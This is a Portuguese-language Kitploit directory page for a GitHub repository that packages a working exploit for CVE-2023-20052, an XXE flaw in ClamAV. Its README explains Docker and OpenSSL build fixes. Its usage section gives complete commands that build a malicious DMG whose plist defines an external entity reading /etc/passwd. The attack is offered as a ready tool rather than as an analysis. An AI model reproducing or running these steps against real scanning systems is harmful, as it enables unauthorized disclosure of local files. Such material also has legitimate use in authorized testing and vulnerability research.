Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-20052 — Construção Docker corrigida para o exploit CVE-2023-20052 ClamAV XXE. Resolve erros de compilação do OpenSSL 3.0 usando Ubuntu 18.04 com OpenSSL 1.0 para compatibilidade com libdmg-hfsplus. Gera arquivos DMG maliciosos para injeção de entidade externa XML. | Kitploit
Ferramentas/GitHubGitHub/mohitsinghpapola/cve-2023-20052
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebFuzzingAnálise de MalwareAnálise de Binários
GitHubmohitsinghpapola/cve-2023-20052

CVE-2023-20052

Construção Docker corrigida para o exploit CVE-2023-20052 ClamAV XXE. Resolve erros de compilação do OpenSSL 3.0 usando Ubuntu 18.04 com OpenSSL 1.0 para compatibilidade com libdmg-hfsplus. Gera arquivos DMG maliciosos para injeção de entidade externa XML.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 6 mesesAinda não revisado

Exploit CVE-2023-20052 - Build Corrigido

Build Docker corrigido para CVE-2023-20052 (vulnerabilidade XXE no ClamAV) que realmente compila.

O Que Estava Quebrado

O exploit original não compila em sistemas modernos:

  • ❌ Erros de compatibilidade com OpenSSL 3.0
  • ❌ Erros de tipo incompleto da struct HMAC_CTX
  • ❌ Erros de declaração implícita de função
  • ❌ Build falha na compilação de dmg/filevault.c

O Que Corrigi

  1. Alterada imagem base: Ubuntu 22.04 → Ubuntu 18.04
  2. Corrigida versão do OpenSSL: Usa libssl1.0-dev (OpenSSL 1.0)
  3. Adicionado modo não interativo: Impede prompts de build
  4. Dockerfile funcional: Realmente compila com sucesso

Por Que Isso Funciona

libdmg-hfsplus usa funções obsoletas do OpenSSL 1.0:

  • HMAC_CTX_init() / HMAC_CTX_cleanup() (removidas no OpenSSL 1.1+)
  • Uso direto da struct HMAC_CTX (opaca no OpenSSL 1.1+)

Ubuntu 18.04 é o último LTS com suporte ao OpenSSL 1.0.

Build e Uso

root@kitploit:~
# Build (takes ~3-5 minutes)
docker build -t cve-2023-20052 .

# Run
docker run -v $(pwd):/exploit -it cve-2023-20052 bash

# Create exploit DMG
genisoimage -D -V "exploit" -no-pad -r -apple -o test.img .
dmg dmg test.img test.dmg
bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>|' -e 's/blkx/&xxe;/' test.dmg -o exploit.dmg

Créditos

  • Exploit original: nokn0wthing/CVE-2023-20052
  • Corrigido por: https://reapsec.com
root@kitploit:~
## Fixed Docker build for CVE-2023-20052 (ClamAV XXE) - Resolves OpenSSL 3.0 compilation errors. Uses Ubuntu 18.04 with OpenSSL 1.0 for compatibility with libdmg-hfsplus
Baixar ferramenta